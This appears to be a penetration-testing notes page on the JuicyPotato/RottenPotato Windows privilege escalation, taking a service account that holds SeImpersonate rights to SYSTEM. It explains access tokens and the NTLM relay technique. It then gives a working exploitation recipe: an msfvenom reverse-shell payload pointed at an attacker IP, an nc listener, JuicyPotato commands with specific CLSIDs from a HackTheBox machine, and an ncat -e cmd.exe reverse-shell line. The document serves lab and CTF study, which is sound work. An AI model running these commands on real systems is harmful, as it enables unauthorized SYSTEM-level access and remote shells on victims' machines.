JuicyPotato/RottenPotato

Short Summary

If an user account you control has the SEImpersonate token (which most service accounts have), then you can get root.

Note: This exploit was effectively patched in Win10 1809 and Windows Server 2019. RoguePotato came out after that and I don't know if/when it was patched. SweetPotato aims to combine various *potato exploits into one script for easy exploitation.

GitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.GitHub

Explanation

Requirements

If your user has SeImpersonate or SeAssignPrimaryToken privileges then you are effectively SYSTEM. Normal users don’t usually have these, but service-level users might. You can check this with whoami /all under "Privileges".

You also need to be able to call a DCOM service, which:

1. implements the IMarshal interface

2. runs as an elevated user (SYSTEM, Administrator, ...)

Normally this is port 6666, but there are other such services, in case that one is blocked.

Tokens

Every process has an access token, which specifies, what kinds of actions you can take. With the right privileges, Windows allows you to impersonate tokens for identification or for doing actions on another user’s behalf.

There are basically two kinds of impersonation tokens:

• Delegate/impersonate - these allow you to perform actions

• Identify/anonymous - for identification, don’t allow you to perform actions.

If you can get a delegate/impersonate impersonated access token with SYSTEM rights, then you can perform actions as SYSTEM.

How It Works

How RottenPotato works at a high level:

1. Trick the “NT AUTHORITY\SYSTEM” account into authenticating via NTLM to a TCP endpoint we control.

2. Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the “NT AUTHORITY\SYSTEM” account. This is done through a series of Windows API calls.

3. Impersonate the token we have just negotiated. This can only be done if the attackers current account has the privilege to impersonate security tokens. This is usually true of most service accounts and not true of most user-level accounts.

Exploitation

First of all, download the juicypotato executable. If the official release isn't working, try an x86 version.

You're going to need something for JuicyPotato to execute when it finishes successfully. For example, you could generate a reverse shell.

msfvenom -p windows/shell_reverse_tcp LHOST="10.10.14.20" LPORT=8002 -f exe > reverse.exe

Listen for the reverse shell on your machine:

nc -lnvp 8002

On the victim machine, execute juicypotato (in this case the x86 variant):

.\JuicyPotato.x86.exe -l 1337 -c "CLSID_HERE" -p C:\path\to\reverse.exe -t *

You're probably going to need to test multiple CLSIDs before you get a working one. Here is a list of CLSIDs to try.

For example, in the hackthebox "devel" machine, this was the successful exploit (my reverse.exe was in the inetpub/wwwroot directory):

.\JuicyPotato.x86.exe -l 1337 -c "{4B635ECB-0887-4015-8CA6-D621362F98D1}" -p C:\inetpub\wwwroot\reverse.exe -t *

Alternatively, you can use it with a static ncat.exe file:

.\JuicyPotato.x86.exe -l 1337 -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}" -p c:\windows\system32\cmd.exe -a "/c C:\Users\Public\ncat.exe -e cmd.exe 10.10.14.17 8002" -t *

External Links

Rotten Potato – Privilege Escalation from Service Accounts to SYSTEMfoxglovesec

Technical explanation of RottenPotato, which JuicyPotato is based on

Blackhat technical talk about tokens